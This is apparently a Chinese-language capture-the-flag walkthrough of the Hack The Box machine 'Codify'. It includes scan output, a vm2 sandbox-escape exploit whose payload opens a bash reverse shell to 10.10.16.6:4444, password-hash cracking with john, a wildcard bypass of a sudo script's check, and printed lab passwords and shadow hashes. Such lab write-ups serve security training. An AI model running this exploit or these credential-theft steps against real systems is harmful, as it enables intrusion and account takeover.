基本信息

端口扫描

22,80,3000,5000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.11.239
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-06 13:58 CST
Nmap scan report for 10.10.11.239
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://codify.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Codify
5000/tcp open  upnp?
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.82 seconds

80/3000

需要加hosts:

1
10.10.11.239 codify.htb

在线nodejs沙盒:

Codify

About里给出了使用的vm2信息,3.9.16:

vm2

很容易搜到相关的沙盒逃逸:

shell

打到svc shell:

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"');
}`

console.log(vm.run(code));

信息

简单的枚举,www目录下contact中发现一个sqlite3 db文件:

tickets.db

查看数据库,其中得到joshua用户密码hash,而joshua也是系统上的一个用户:

可以破解出joshua用户密码:

1
2
3
4
5
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

spongebob1

user flag

joshua用户使用破解出的密码登录:

提权信息

可以sudo运行一个sh,查看代码可以知道是需要验证用户是否知道数据库密码,校验通过后执行数据库备份任务:

但注意代码中的校验逻辑,预设的是DB_PASS,最终执行备份任务使用的也是这个真正的数据库密码,用户输入的是USER_PASS,简单的两个变量进行比较,对于用户输入也没做限制,那可以简单的使用星号来绕过校验:

同样是根据代码,校验通过后执行数据库备份任务,是直接将真正的数据库密码DB_PASS变量带入到命令行,那基础的pspy之类即可捕获运行时完整命令行从而获得密码

DB_PASS

所以就是两个ssh会话窗口,一个开pspy,另一个sudo运行数据库备份脚本,从而在第一个窗口捕获数据库密码:

1
/usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql

提权 & root flag

得到的数据库密码就是root密码:

1
kljh12k3jhaskjh12kjh3

shadow

1
2
3
root:$y$j9T$BBviiq1eNRUe8DLwu.mU61$WSfwzensYi9zIITP5VaFmA6wmTOza/5hbDf0jvo1ZS0:19507:0:99999:7:::
joshua:$y$j9T$u5RmR.i3n0eWNlz3TzNwW1$70opNAIyjWmEs5kR5suhb9xTavS294cdqpt3jB2T.H6:19507:0:99999:7:::
svc:$y$j9T$g22oO8nqTahqa94dBOVRu1$2xgi2cpPO/EWoP4EMFxhhLBwpCWASWaZTap9YtxqkV.:19612:0:99999:7:::

参考资料